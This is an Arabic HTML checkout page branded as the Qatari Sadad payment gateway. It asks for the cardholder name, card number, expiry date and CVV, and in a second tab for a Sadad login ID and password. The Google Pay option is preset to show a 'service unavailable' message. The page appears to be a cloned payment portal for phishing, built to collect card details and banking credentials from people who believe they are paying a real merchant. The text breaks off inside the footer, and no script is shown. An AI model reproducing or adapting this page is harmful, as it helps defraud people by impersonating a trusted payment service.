<!DOCTYPE html>
<html lang="ar" dir="rtl">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>الدفع</title>
    <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@400;700&display=swap" rel="stylesheet" />
    <style>
        * {
            box-sizing: border-box;
        }

        body {
            margin: 0;
            font-family: "Cairo", sans-serif;
            background: #f5f6f8;
            display: flex;
            justify-content: center;

        }

        .container {
            background: #fff;
            width: 100vw;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            align-items: center;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
            background: #8d193c;
        }

        header {
            color: #fff;
            padding: 10px 15px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            width: 100%;
        }

        header img {
            width: 40px;
            height: 40px;
            border-radius: 6px;
            background: #fff;
        }

        header div {
            cursor: pointer;
            display: flex;
            align-items: flex-end;
            gap: 2px;
        }

        header div img {
            width: 15px;
            height: 15px;
            background-color: transparent;
        }

        .page-content {
            flex: 1;
            display: flex;
            flex-direction: column;
            border-radius: 12px;
            overflow: hidden;
            background-color: white;
            margin-bottom: 10px;
            max-width: 600px;
        }

        h2 {
            text-align: center;
        }

        h2 .currency {
            color: #92002c;
        }

        .details-toggle {
            background: #f5f6f8;
            padding: 15px;
            cursor: pointer;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .details-content {
            display: none;
            padding: 15px;
            font-size: 14px;
            color: #333;
        }

        .details-content.active {
            display: block;
        }

        .currency {
            font-size: 0.7em;
            vertical-align: super;
        }

        .google-pay {
            margin: 15px;
            background: #000;
            color: #fff;
            border-radius: 6px;
            cursor: pointer;
            height: 44px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .google-pay img {
            width: 50px;
        }

        .error-msg {
            color: red;
            text-align: center;
            font-size: 14px;
            margin: 5px 0;
            display: none;
        }

        .divider {
            display: flex;
            align-items: center;
            text-align: center;
            margin: 20px 0;
            color: #555;
            font-size: 14px;
        }

        .divider::before,
        .divider::after {
            content: "";
            flex: 1;
            border-bottom: 1px solid #ccc;
        }

        .divider::before {
            margin-left: .75em;
        }

        .divider::after {
            margin-right: .75em;
        }

        .tabs {
            display: flex;
            gap: 10px;
            padding: 0 10px;
        }

        .tabs button {
            flex: 1;
            padding: 10px 5px;
            border: none;
            border-radius: 6px;
            background: #f1f1f1;
            cursor: pointer;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            gap: 8px;
            font-size: 14px;
            color: #555;
            transition: background 0.3s;

        }

        .tabs button svg {
            color: #92002c;
        }

        .tabs button img {
            width: 16px;
        }

        .tabs button.active {
            background: #92002c;
            color: #fff;
        }

        .tabs button.active svg {
            color: #fff;
        }

        form {
            padding: 15px;
        }

        input {
            width: 100%;
            padding: 10px;
            margin-bottom: 12px;
            border: 1px solid #ccc;
            border-radius: 6px;
            font-size: 14px;
        }

        input:focus {
            outline: none;
            border: 2px solid #92002c;
        }

        .input-box {
            position: relative;
        }

        .input-box>.images {
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 5px;
            width: fit-content;
            position: absolute;
            top: 0;
            left: 10px;
            transform: translateY(50%);
        }


        .input-row {
            display: flex;
            gap: 10px;
        }

        #errorBox {
            color: red;
            margin: 8px 0;
            font-size: 12px;
        }

        .pay-btn {
            width: 100%;
            padding: 12px;
            background: #92002c;
            color: #fff;
            border: none;
            border-radius: 6px;
            cursor: pointer;
            font-size: 16px;
        }

        .pay-btn:hover {
            background: #69122c;
        }

        .pay-btn.loading {
            cursor: not-allowed;
        }

        .pay-btn img {
            width: 18px;
            height: 18px;
        }

        footer {
            margin-top: auto;
            padding: 15px;
            text-align: center;
            background: #f5f6f8;
        }

        footer img {
            width: 55px;
            height: 28px;
            margin: 5px;
        }

        footer ul {
            list-style: none;
            padding: 0;
            display: flex;
            justify-content: center;
            justify-content: space-between;
            gap: 2px;
            font-size: 10px;
        }
    </style>
</head>

<body>
    <div class="container">
        <header>
            <img src="images/sadad-logo.svg" alt="Logo" />
            <div>Ar
                <img src="detail-down-arrow.svg" alt />
            </div>
        </header>

        <div class="page-content">
            <h2><strong id="totalAmount"></strong>
            <span class="currency">QAR</span></h2>
            <div class="details-toggle">
                <span>التفاصيل</span>
                <img src="images/detail-down-arrow.svg" alt="arrow" />
            </div>
            <div class="details-content" id="detailsBox">
                <p>المبلغ الإجمالي: <strong id="totalAmount"></strong> <span class="currency">QAR</span></p>
                <p>التاريخ: <strong id="dateNow"></strong></p>
                <p>إلى: <strong id="customerName"></strong></p>
                <p>رقم الفاتورة: <strong id="invoiceNo"></strong></p>
                <p>الوصف: <strong id="desc"></strong></p>
            </div>

            <div class="google-pay" id="gpayBtn">
                <img src="images/light_gpay.svg" alt>
            </div>
            <div class="error-msg" id="gpayError">هذه الخدمة غير متاحة
                حاليا</div>
            <div class="divider">أو الدفع باستخدام</div>

            <div class="tabs">
                <button class="active" data-tab="credit">
                    <svg xmlns="http://www.w3.org/2000/svg" width="22.254" height="16.023" viewBox="0 0 22.254 16.023">
                        <g id="Group_73350" data-name="Group 73350" transform="translate(-971.516 -273.441)">
                            <g id="Group_73257" data-name="Group 73257" transform="translate(-9.774 -22.709)">
                                <g id="card-payment-svgrepo-com" transform="translate(981.29 296.15)">
                                    <path id="Path_24692" data-name="Path 24692"
                                        d="M20.7,158.493a.668.668,0,0,0,.668-.668V144.918a.668.668,0,0,0-.668-.668H1.558a.668.668,0,0,0-.668.668v12.907a.668.668,0,0,0,.668.668Zm0,.89H1.558A1.558,1.558,0,0,1,0,157.825V144.918a1.558,1.558,0,0,1,1.558-1.558H20.7a1.558,1.558,0,0,1,1.558,1.558v12.907A1.558,1.558,0,0,1,20.7,159.383Z"
                                        transform="translate(0 -143.36)" fill="currentColor"></path>
                                    <path id="Path_24693" data-name="Path 24693" d="M23.48,268h21.3v-.89H23.48Z"
                                        transform="translate(-22.97 -264.419)" fill="currentColor"></path>
                                </g>
                            </g>
                            <g id="Group_73340" data-name="Group 73340" transform="translate(7648.591 -4601.949)">
                                <path id="Path_25974" data-name="Path 25974"
                                    d="M-6671.812,4888.369l1.939-4.2,5.543.721Z" transform="translate(2.243 0.042)"
                                    fill="#d1a1ae"></path>
                                <path id="Path_25975" data-name="Path 25975"
                                    d="M-6671.812,4888.369l1.939-4.2,5.543.721Z" transform="translate(2.991 -2.804)"
                                    fill="currentColor"></path>
                                <path id="Path_25973" data-name="Path 25973"
                                    d="M-6671.812,4888.369l1.939-4.2,5.543.721Z" transform="translate(0 -0.706)"
                                    fill="currentColor"></path>
                            </g>
                        </g>
                    </svg>
                    بطاقة ائتمان</button>
                <button data-tab="debit">
                    <svg xmlns="http://www.w3.org/2000/svg" width="22.254" height="16.023" viewBox="0 0 22.254 16.023">
                        <g id="Group_73350" data-name="Group 73350" transform="translate(-971.516 -273.441)">
                            <g id="Group_73257" data-name="Group 73257" transform="translate(-9.774 -22.709)">
                                <g id="card-payment-svgrepo-com" transform="translate(981.29 296.15)">
                                    <path id="Path_24692" data-name="Path 24692"
                                        d="M20.7,158.493a.668.668,0,0,0,.668-.668V144.918a.668.668,0,0,0-.668-.668H1.558a.668.668,0,0,0-.668.668v12.907a.668.668,0,0,0,.668.668Zm0,.89H1.558A1.558,1.558,0,0,1,0,157.825V144.918a1.558,1.558,0,0,1,1.558-1.558H20.7a1.558,1.558,0,0,1,1.558,1.558v12.907A1.558,1.558,0,0,1,20.7,159.383Z"
                                        transform="translate(0 -143.36)" fill="currentColor"></path>
                                    <path id="Path_24693" data-name="Path 24693" d="M23.48,268h21.3v-.89H23.48Z"
                                        transform="translate(-22.97 -264.419)" fill="currentColor"></path>
                                </g>
                            </g>
                            <g id="Group_73340" data-name="Group 73340" transform="translate(7648.591 -4601.949)">
                                <path id="Path_25974" data-name="Path 25974"
                                    d="M-6671.812,4888.369l1.939-4.2,5.543.721Z" transform="translate(2.243 0.042)"
                                    fill="#d1a1ae"></path>
                                <path id="Path_25975" data-name="Path 25975"
                                    d="M-6671.812,4888.369l1.939-4.2,5.543.721Z" transform="translate(2.991 -2.804)"
                                    fill="currentColor"></path>
                                <path id="Path_25973" data-name="Path 25973"
                                    d="M-6671.812,4888.369l1.939-4.2,5.543.721Z" transform="translate(0 -0.706)"
                                    fill="currentColor"></path>
                            </g>
                        </g>
                    </svg>
                    بطاقة صرف آلي</button>
                <button data-tab="sadad">
                    <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg"
                        xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="18.039px" height="16.161px"
                        viewBox="0 0 18.039 16.161" enable-background="new 0 0 18.039 16.161" xml:space="preserve">
                        <g id="shutterstock_1344066536_Converted_" transform="translate(0.15 0.151)">
                            <g id="Path_24694">
                                <path fill="currentColor"
                                    d="M16.619,8.559V8.55h-0.31V6.49c-0.051-1.16-0.99-2.06-2.15-2.06h-0.49l-0.09-1.12
                                                                        c-0.01-0.11-0.07-0.21-0.15-0.27c-0.09-0.06-0.199-0.08-0.3-0.06l-1.26,0.22c0.07-0.07,0.12-0.18,0.11-0.29l-0.17-1.47
                                                                        c-0.021-0.13-0.101-0.23-0.21-0.28c-0.11-0.06-0.25-0.06-0.341-0.01l-1.08,0.49c0.03-0.07,0.03-0.15,0.021-0.22l-0.49-1.31
                                                                        c-0.05-0.12-0.14-0.2-0.26-0.24c-0.12-0.03-0.24,0-0.35,0.07l-6.02,4.5h-1.08c-1.16,0-2.1,0.9-2.15,2.07v7.45
                                                                        c0.05,1.16,0.99,2.06,2.15,2.06h12.15c1.16,0,2.1-0.899,2.149-2.06v-2.05h0.181c0.76,0,1.38-0.601,1.409-1.36V9.89
                                                                        C17.859,9.18,17.309,8.62,16.619,8.559z M12.85,3.78l0.06,0.66h-3.68L12.85,3.78z M11.1,2.03l0.109,0.96
                                                                        c0.021,0.13,0.11,0.24,0.23,0.29l-5.2,0.93L11.1,2.03z M9.159,0.84l0.3,0.79c0.04,0.11,0.13,0.19,0.24,0.22l-4.76,2.14L9.159,0.84
                                                                        z M14.149,15.269H2.019c-0.74,0-1.35-0.58-1.39-1.32v-2.3h1.79l1.57,1.45c-0.09,0.17-0.14,0.36-0.14,0.54
                                                                        c-0.03,0.36,0.08,0.7,0.31,0.97c0.23,0.271,0.55,0.431,0.9,0.46c0.73,0.061,1.37-0.5,1.43-1.22c0.02-0.35-0.09-0.689-0.32-0.96
                                                                        c-0.23-0.27-0.55-0.43-0.9-0.46h-0.11c-0.22,0-0.43,0.05-0.63,0.15l-1.69-1.561c-0.07-0.07-0.16-0.109-0.27-0.109h-1.94v-0.32
                                                                        h5.52c0.18,0.51,0.67,0.859,1.24,0.859c0.68,0.061,1.28-0.46,1.33-1.13c0.03-0.319-0.08-0.64-0.29-0.89S7.919,9.019,7.589,9
                                                                        c-0.07-0.011-0.11-0.011-0.21,0c-0.56,0-1.04,0.35-1.23,0.859h-5.52V9.54h2.54c0.1,0,0.19-0.04,0.26-0.11l1.7-1.56
                                                                        c0.19,0.1,0.41,0.15,0.64,0.15c0.68-0.05,1.19-0.65,1.13-1.32c-0.05-0.67-0.65-1.2-1.32-1.13c-0.64,0.05-1.14,0.59-1.14,1.22
                                                                        c0,0.2,0.05,0.39,0.14,0.56L3.009,8.8h-2.38V6.51c0.03-0.75,0.64-1.33,1.38-1.33h12.129c0.75,0,1.36,0.58,1.391,1.32v2.05h-1.66
                                                                        c-0.75,0-1.37,0.59-1.4,1.36v0.649c0.03,0.76,0.65,1.351,1.4,1.351h1.65v2.039l0.01,0.07
                                                                        C15.459,14.729,14.859,15.269,14.149,15.269z M4.639,13.66c0-0.131,0.05-0.25,0.14-0.341c0.1-0.09,0.22-0.14,0.35-0.149h0.04
                                                                        c0.12,0.01,0.24,0.069,0.33,0.17c0.08,0.1,0.12,0.22,0.11,0.359c-0.02,0.25-0.23,0.45-0.48,0.45l-0.04-0.01
                                                                        C4.829,14.12,4.639,13.91,4.639,13.66z M6.869,10.21c-0.01-0.141,0.03-0.28,0.13-0.391c0.09-0.109,0.22-0.18,0.37-0.189h0.04
                                                                        c0.28,0,0.52,0.22,0.54,0.5c0.01,0.14-0.04,0.28-0.13,0.39c-0.09,0.11-0.22,0.18-0.37,0.19h-0.07
                                                                        C7.109,10.71,6.879,10.5,6.869,10.21z M5.229,6.78c-0.01-0.15,0.03-0.29,0.13-0.4c0.09-0.11,0.22-0.18,0.37-0.19
                                                                        c0.31-0.02,0.56,0.2,0.58,0.5c0.03,0.3-0.2,0.56-0.49,0.58l-0.08,0.01c-0.12,0-0.24-0.05-0.33-0.12l-0.04-0.03
                                                                        C5.279,7.039,5.229,6.92,5.229,6.78z M17.119,10.54c-0.01,0.35-0.3,0.62-0.68,0.62h-2.54c-0.351,0-0.63-0.271-0.65-0.61v-0.65
                                                                        c0.021-0.34,0.3-0.62,0.68-0.62h2.54c0.351,0,0.641,0.271,0.65,0.62V10.54z">
                                </path>
                            </g>
                            <g id="Path_24695">
                                <path fill="currentColor" d="M16.739,10.3c0,0.399-0.33,0.729-0.73,0.729c-0.399,0-0.729-0.33-0.729-0.729c0-0.4,0.33-0.73,0.729-0.73
                                                                        C16.409,9.569,16.739,9.899,16.739,10.3z">
                                </path>
                            </g>
                        </g>
                    </svg>
                    سداد</button>
            </div>

            <form id="paymentForm">
                <div id="creditForm">
                    <input type="text" id="cardName" placeholder="اسم صاحب البطاقة" />
                    <div class="input-box">
                        <div class="images">
                            <img src="images/americanexpress.svg" alt="">
                            <img src="images/master.svg" alt="">
                            <img src="images/visa.svg" alt="">
                        </div>
                        <input type="text" id="cardNumber" placeholder="رقم البطاقة" maxlength="16" />
                    </div>
                    <div class="input-row">
                        <input type="text" id="expiry" placeholder="MM/YY" />
                        <div class="input-box">
                            <div class="images">
                                <svg xmlns="http://www.w3.org/2000/svg" style="margin-top: 5px;" color="#92002c"
                                    width="24px" height="12px" viewBox="0 0 377.684 234.212" style="">
                                    <g id="CVV" transform="translate(-796.162 -192.864)">
                                        <path style="fill: #92002c" id="Path_1" data-name="Path 1"
                                            d="M985.121,1048.416h186.251c.67,0,1.34.016,2.01.032a.471.471,0,0,1,.4.4c.016.153.04.307.048.46.008.412.008.824.008,1.235v144.812c0,.258-.008.517,0,.775a5.694,5.694,0,0,1-.21,1.688c-.21.743-.315,1.51-.557,2.253a19.822,19.822,0,0,1-4.764,7.881,18.254,18.254,0,0,1-9.076,5.039c-.7.161-1.413.307-2.116.452a4.869,4.869,0,0,1-.767.081c-.517.016-1.034.008-1.55.008H815.932c-.565,0-1.139-.008-1.7,0a3.315,3.315,0,0,1-1.5-.275,4.6,4.6,0,0,0-1.2-.323c-.258-.04-.5-.1-.759-.161a17.289,17.289,0,0,1-6.452-2.907,19.22,19.22,0,0,1-6.936-8.721,18.808,18.808,0,0,1-1.082-4.029,15.8,15.8,0,0,1-.137-2.471c0-.88.008-1.752.008-2.633V1050.758a12.871,12.871,0,0,1,.057-2.011.5.5,0,0,1,.315-.3c.1-.008.2-.032.307-.04.258-.008.517-.008.775-.008h1.55q92.972.024,185.944.016Zm-55.174,63.863h107.386c.153,0,.307-.008.46-.016a.478.478,0,0,0,.509-.46c.016-.412.032-.823.032-1.235v-42.594c0-.363-.008-.719-.024-1.082a.6.6,0,0,0-.073-.291.44.44,0,0,0-.218-.2,3.68,3.68,0,0,0-1.074-.1c-3.771-.04-7.542-.1-11.313-.113q-16.352-.049-32.695-.065-63.068-.012-126.127-.016-19.44,0-38.888.057c-1.7,0-3.408.024-5.111.048a3.9,3.9,0,0,0-.606.081.531.531,0,0,0-.3.331,2.084,2.084,0,0,0-.048.3c-.008.468-.016.929-.016,1.4v41.819c0,.412,0,.823.008,1.235,0,.153.024.307.032.46a.448.448,0,0,0,.38.412c.622.016,1.235.04,1.857.04Zm53.891,16.117H825.783c-.565,0-1.139,0-1.7.008a1.743,1.743,0,0,0-.46.049,2.207,2.207,0,0,0-1.7,1.97,4.384,4.384,0,0,0,0,.46,1.907,1.907,0,0,0,.355,1.009,2.111,2.111,0,0,0,1.542.937c.2.024.412.032.622.04.468.008.929,0,1.4,0h315.963c.517,0,1.034.008,1.55-.008a4.855,4.855,0,0,0,.767-.1,1.875,1.875,0,0,0,1.058-.605,2.148,2.148,0,0,0,.589-1.849,2.263,2.263,0,0,0-2.14-1.9c-.622-.016-1.244-.008-1.857-.008Q1062.768,1128.392,983.837,1128.4Zm.04,20.122h-158.2c-.622,0-1.243.008-1.857,0a2.053,2.053,0,0,0-1.163.371,2.162,2.162,0,0,0-1,1.825,2.135,2.135,0,0,0,.848,1.744,1.882,1.882,0,0,0,.977.428,11.424,11.424,0,0,0,1.389.065c1.034-.008,2.067-.024,3.1-.024H880.5q26.259,0,52.526,0c17.506.008,35.02-.048,52.526.04h156.5c.468,0,.929,0,1.4-.008a5.112,5.112,0,0,0,.614-.048,1.868,1.868,0,0,0,1.389-.88,2.119,2.119,0,0,0,.347-1.171,2.26,2.26,0,0,0-.355-1.324,2.092,2.092,0,0,0-1.663-1c-.67-.04-1.34-.024-2.011-.024Q1062.828,1148.523,983.878,1148.519ZM983.724,1183h157.594c.622,0,1.244,0,1.857-.008a6.028,6.028,0,0,0,.767-.065,1.651,1.651,0,0,0,.84-.371,2,2,0,0,0,.8-1.445,2.994,2.994,0,0,0-.073-1.074,1.658,1.658,0,0,0-.178-.428,2.062,2.062,0,0,0-1.647-1.017c-.67-.048-1.34-.024-2.011-.024H827.891c-1.082,0-2.172-.008-3.254-.008a8.048,8.048,0,0,0-1.082.04,2.017,2.017,0,0,0-1.5.977,2.248,2.248,0,0,0,.065,2.487,1.905,1.905,0,0,0,1.4.88,7.909,7.909,0,0,0,1.235.065c.985-.016,1.962-.024,2.947-.024Q905.7,1183.006,983.724,1183Zm-.048-10.013h158.192c.565,0,1.139,0,1.7-.016a2.254,2.254,0,0,0,.46-.065,2.078,2.078,0,0,0,1.462-1.639,7.142,7.142,0,0,0,.008-.928,1.272,1.272,0,0,0-.1-.452,1.959,1.959,0,0,0-1.768-1.3c-.67-.032-1.34-.024-2.011-.024H825.7c-.517,0-1.034-.008-1.55.008-.258.008-.517.032-.767.065a.9.9,0,0,0-.3.073,2.23,2.23,0,0,0-1.405,1.89,2.144,2.144,0,0,0,.953,2,1.721,1.721,0,0,0,1,.38c.363.008.719.016,1.082.016,1.138,0,2.269-.008,3.407-.008Zm.065-30.046v.024h159.12c.21,0,.412-.008.622-.016a1.8,1.8,0,0,0,1-.363,2.241,2.241,0,0,0,.291-3.5,1.958,1.958,0,0,0-1.082-.565,6.368,6.368,0,0,0-1.235-.089c-1.187.016-2.374.032-3.561.032H830.886c-2.172,0-4.336.057-6.508-.057a3.248,3.248,0,0,0-1.074.137,1.865,1.865,0,0,0-.557.266,2.309,2.309,0,0,0-.864,2.6,2.282,2.282,0,0,0,1.962,1.518c.622.008,1.235.008,1.857.008H983.74Zm-.178,20.106h157.893c.622,0,1.244,0,1.857-.008a2.879,2.879,0,0,0,.46-.032,2.122,2.122,0,0,0,1.672-1.631,4.081,4.081,0,0,0,.048-.767,1.959,1.959,0,0,0-.824-1.591,1.6,1.6,0,0,0-.694-.315,7.05,7.05,0,0,0-1.542-.1c-1.082.016-2.172.04-3.254.04H828.964c-1.55,0-3.1-.024-4.651-.032a4.753,4.753,0,0,0-1.074.1,1.842,1.842,0,0,0-.565.242,2.108,2.108,0,0,0-.783.937,2.157,2.157,0,0,0,0,1.8,2.116,2.116,0,0,0,1.906,1.357c.614.04,1.235.016,1.857.016Q904.625,1163.041,983.563,1163.045Zm119.118-50.435,17.49.089,17.506.1c.412,0,.824.008,1.235,0a6.948,6.948,0,0,0,6.654-5.45,9.649,9.649,0,0,0,.186-2.156v-16.884c0-.363.008-.727-.008-1.082a7.25,7.25,0,0,0-.428-2.116,6.961,6.961,0,0,0-4.005-4.07,5.429,5.429,0,0,0-1.954-.444c-.565-.016-1.139-.032-1.7-.032h-72.664c-.412,0-.824-.008-1.235.008-.46.016-.929.057-1.389.089a2.291,2.291,0,0,0-.46.081,6.847,6.847,0,0,0-4.223,3.173,6.058,6.058,0,0,0-.888,2.778c-.024.412-.04.824-.04,1.235v17.5c0,.412.016.823.04,1.235a5.463,5.463,0,0,0,.88,2.608,7.115,7.115,0,0,0,3.084,2.729,5.966,5.966,0,0,0,2.382.6c.565.008,1.139.016,1.7.016C1076.947,1112.618,1089.027,1112.61,1102.681,1112.61Z"
                                            transform="translate(0 -786.454)"></path>
                                        <path style="fill: #92002c" id="Path_2" data-name="Path 2"
                                            d="M973.39,222.331c-39.55.008-90.735.024-141.921.048q-15.031,0-30.062.057c-1.292,0-2.584.024-3.876.024-.258,0-.509-.04-.767-.057a.537.537,0,0,1-.315-.307c-.016-.2-.048-.412-.048-.614v-9.447a19.807,19.807,0,0,1,.371-3.844,16.845,16.845,0,0,1,2.293-5.878,25.362,25.362,0,0,1,1.906-2.632,18.683,18.683,0,0,1,8.422-5.83,19.746,19.746,0,0,1,3.609-.864,16.857,16.857,0,0,1,2.632-.121c1.34.008,2.689.016,4.029.016h331.919c.727,0,1.445.016,2.172,0a23.636,23.636,0,0,1,4.764.509,19.023,19.023,0,0,1,5.1,1.785,19.6,19.6,0,0,1,4.336,2.955,18.53,18.53,0,0,1,5.5,8.64c.145.493.283.993.388,1.494a10.736,10.736,0,0,1,.226,2.156c-.008,3.617,0,7.227-.008,10.844,0,.258-.024.517-.04.775a.63.63,0,0,1-.412.42c-.307.016-.622.04-.929.04-3,0-5.991.008-8.987,0-3.722-.008-7.437-.04-11.159-.048q-28.742-.036-57.492-.065C1058.368,222.348,1021.7,222.34,973.39,222.331Z"
                                            transform="translate(-0.219)"></path>
                                        <path style="fill: #92002c" id="Path_3" data-name="Path 3"
                                            d="M4106.373,1489.8h36.248c.517,0,1.034.008,1.55.008a2.659,2.659,0,0,1,1.05.242,3.531,3.531,0,0,1,2.236,3.246c.024.363.008.719.008,1.082v16.1c0,.307.008.622-.008.929a3.71,3.71,0,0,1-1.558,2.9,3.31,3.31,0,0,1-1.865.678c-.364.016-.719.016-1.082.016q-15.491,0-30.975,0c-5.063.008-10.118.04-15.181.056q-11.773.049-23.546.1c-1.446.008-2.891,0-4.336.016a3.744,3.744,0,0,1-1.51-.307,3.481,3.481,0,0,1-1.978-2.059,2.174,2.174,0,0,1-.113-.452c-.04-.355-.081-.719-.1-1.074-.016-.412-.008-.824-.008-1.235q0-8.2-.008-16.408a5.826,5.826,0,0,1,.064-.921,3.4,3.4,0,0,1,1.7-2.463,2.988,2.988,0,0,1,1.615-.468h.775q18.507.012,37.014.008Zm-2.326,12.532c-.016.04-.016.1-.048.129a1.525,1.525,0,0,1-.339.307l-2.762,1.72c-.258.161-.525.331-.775.509a.359.359,0,0,0-.137.533,21.747,21.747,0,0,0,1.349,2.075.511.511,0,0,0,.428.1c.226-.121.46-.234.686-.363.767-.428,1.526-.872,2.285-1.3.226-.129.452-.242.686-.355.186-.1.469.032.477.218.017.258.041.517.041.767.008.929,0,1.857.008,2.786,0,.258.024.517.032.775a.488.488,0,0,0,.4.4,16.746,16.746,0,0,0,2.625.016.958.958,0,0,0,.145-.04.528.528,0,0,0,.307-.323c.024-.258.057-.509.057-.767.008-1.082.008-2.164.016-3.246a.9.9,0,0,1,.1-.452.245.245,0,0,1,.242-.137.7.7,0,0,1,.291.065c.855.476,1.712.953,2.568,1.437.266.153.541.3.815.452a.5.5,0,0,0,.678-.113c.42-.654.832-1.308,1.244-1.962a.454.454,0,0,0,.048-.145.307.307,0,0,0-.064-.291,3.186,3.186,0,0,0-.355-.3q-1.5-.957-3-1.906a2.664,2.664,0,0,1-.614-.46.173.173,0,0,1,.024-.266,2.4,2.4,0,0,1,.355-.291c.88-.541,1.76-1.074,2.64-1.615.267-.161.525-.331.783-.5a.464.464,0,0,0,.194-.654c-.42-.646-.848-1.292-1.268-1.938a.468.468,0,0,0-.549-.146c-.993.549-1.978,1.106-2.972,1.655-.226.121-.46.234-.694.347a.353.353,0,0,1-.379-.162,1.088,1.088,0,0,1-.081-.452c-.008-1.082-.008-2.164-.016-3.246-.008-.993-.1-1.09-1.026-1.1-.517-.008-1.033,0-1.55,0-.154,0-.307.008-.461.016a.531.531,0,0,0-.508.477c-.016.412-.024.824-.032,1.235-.008.88,0,1.752-.008,2.632a1.4,1.4,0,0,1-.064.452.265.265,0,0,1-.242.137,1.179,1.179,0,0,1-.428-.153c-1.034-.573-2.067-1.163-3.109-1.736a2.464,2.464,0,0,0-.428-.169.256.256,0,0,0-.282.089,14.663,14.663,0,0,0-1.43,2.2.411.411,0,0,0,.113.42c.218.145.428.291.646.428.92.573,1.841,1.147,2.753,1.72a5.291,5.291,0,0,1,.493.371C4104.007,1502.232,4104.023,1502.288,4104.047,1502.337Zm-9.479-2.947a1.12,1.12,0,0,0-.089-.291c-.42-.646-.848-1.292-1.276-1.938a.23.23,0,0,0-.121-.089c-.1-.032-.218-.089-.291-.056-1,.541-1.986,1.09-2.98,1.631a4.893,4.893,0,0,1-.823.412c-.121.04-.355-.065-.363-.178-.016-.2-.057-.412-.057-.614-.008-1.082,0-2.164-.008-3.246a3.157,3.157,0,0,0-.064-.614.337.337,0,0,0-.2-.218,1.414,1.414,0,0,0-.452-.1c-.719-.008-1.446-.008-2.164,0-.1,0-.2.032-.307.04a.52.52,0,0,0-.388.428c-.016.307-.032.614-.032.929-.008.929,0,1.857-.008,2.786a1.985,1.985,0,0,1-.065.614.337.337,0,0,1-.371.161,2.956,2.956,0,0,1-.283-.121c-.719-.4-1.437-.816-2.156-1.219l-1.211-.678a.487.487,0,0,0-.557.113c-.42.646-.84,1.3-1.251,1.946-.024.04-.032.1-.057.145a.523.523,0,0,0,.113.428c.25.178.5.363.759.533.743.468,1.494.921,2.237,1.389.307.194.589.412.888.622a.253.253,0,0,1-.024.388c-.21.145-.412.307-.63.444-1.009.63-2.019,1.244-3.02,1.873-.355.226-.42.428-.218.767.315.533.654,1.05.985,1.575.363.557.492.589,1.13.234.4-.218.807-.46,1.211-.686.444-.259.888-.525,1.332-.775.226-.121.468-.218.7-.323a.34.34,0,0,1,.46.25c.016.258.04.517.04.767.008.824,0,1.647,0,2.471,0,.307.016.622.024.929a.571.571,0,0,0,.469.533,15.766,15.766,0,0,0,2.471-.016c.048-.008.113-.008.146-.04.081-.065.186-.129.2-.218a2.542,2.542,0,0,0,.073-.606c.008-1.13,0-2.269.016-3.4a5.471,5.471,0,0,1,.073-.614c.089-.048.178-.129.267-.129a1.2,1.2,0,0,1,.444.113c.953.509,1.906,1.034,2.858,1.55.274.145.549.283.824.42a.467.467,0,0,0,.42-.129c.42-.646.84-1.292,1.26-1.946a.762.762,0,0,0,.057-.145.388.388,0,0,0-.073-.428c-.21-.146-.42-.3-.63-.436-.92-.573-1.841-1.147-2.753-1.72a5.562,5.562,0,0,1-.5-.355.252.252,0,0,1-.008-.388c.169-.121.331-.25.5-.355.92-.573,1.841-1.147,2.754-1.72.218-.137.428-.291.638-.436A.279.279,0,0,0,4094.568,1499.39Zm42.19-.032a.746.746,0,0,0-.041-.145,20.272,20.272,0,0,0-1.332-2.083.486.486,0,0,0-.428-.1c-.412.218-.824.436-1.228.662-.767.42-1.534.848-2.3,1.276a2,2,0,0,1-.282.1c-.121.048-.348-.073-.355-.194-.016-.2-.048-.412-.048-.614-.008-.928,0-1.857-.008-2.786,0-.307-.024-.622-.032-.929a.48.48,0,0,0-.4-.4,21.893,21.893,0,0,0-2.625-.024c-.048,0-.1.032-.145.032a.549.549,0,0,0-.331.3,5.214,5.214,0,0,0-.057.614c-.008.928,0,1.857-.008,2.786,0,.307-.024.614-.041.929a.327.327,0,0,1-.452.258c-.63-.347-1.259-.7-1.889-1.05-.589-.323-1.171-.654-1.76-.977a.424.424,0,0,0-.42.1,17.5,17.5,0,0,0-1.349,2.067.427.427,0,0,0,.162.541c.347.226.694.452,1.042.67.832.525,1.664,1.042,2.487,1.566.129.081.234.2.355.291s.113.161,0,.25a3.946,3.946,0,0,1-.355.291c-.832.525-1.663,1.034-2.495,1.55-.348.218-.694.444-1.042.662a.4.4,0,0,0-.129.541c.331.525.662,1.042.993,1.566.517.824.613.678,1.356.3.46-.234.9-.517,1.34-.767.541-.307,1.082-.606,1.623-.9a1.193,1.193,0,0,1,.291-.081.337.337,0,0,1,.355.218,6.1,6.1,0,0,1,.057,1.082c.016,1.082.024,2.164.04,3.246a.476.476,0,0,0,.364.428,15.828,15.828,0,0,0,2.624.016c.048,0,.1-.032.154-.032.1-.016.3-.218.3-.315.016-.258.041-.517.048-.767.008-1.034,0-2.067.008-3.093a2.624,2.624,0,0,1,.065-.614.3.3,0,0,1,.226-.161,1.049,1.049,0,0,1,.436.129c.945.525,1.89,1.066,2.834,1.591.226.121.46.226.694.331a.241.241,0,0,0,.291-.065,1.415,1.415,0,0,0,.21-.226c.387-.606.775-1.219,1.163-1.825.153-.242.081-.468-.186-.646l-.775-.509-2.5-1.551c-.17-.1-.331-.242-.493-.363a.24.24,0,0,1,.057-.38c.169-.121.339-.242.509-.347.92-.573,1.841-1.147,2.753-1.72.218-.137.42-.291.63-.444A.34.34,0,0,0,4136.758,1499.357Z"
                                            transform="translate(-3005.073 -1192.209)"></path>
                                    </g>
                                </svg>
                            </div>
                            <input type="password" id="cvv" placeholder="رمز الأمان" maxlength="3" />
                        </div>
                    </div>
                </div>

                <div id="sadadForm" style="display: none">
                    <input type="text" id="sadadId" placeholder="رقم الدخول" />
                    <input type="password" id="sadadPass" placeholder="كلمة المرور">
                </div>
                <div id="errorBox"></div>
                <button type="submit" class="pay-btn" id="payBtn"></button>
            </form>
            <footer>
                <div>
                    <img src="images/pci.svg" alt="PCI" />
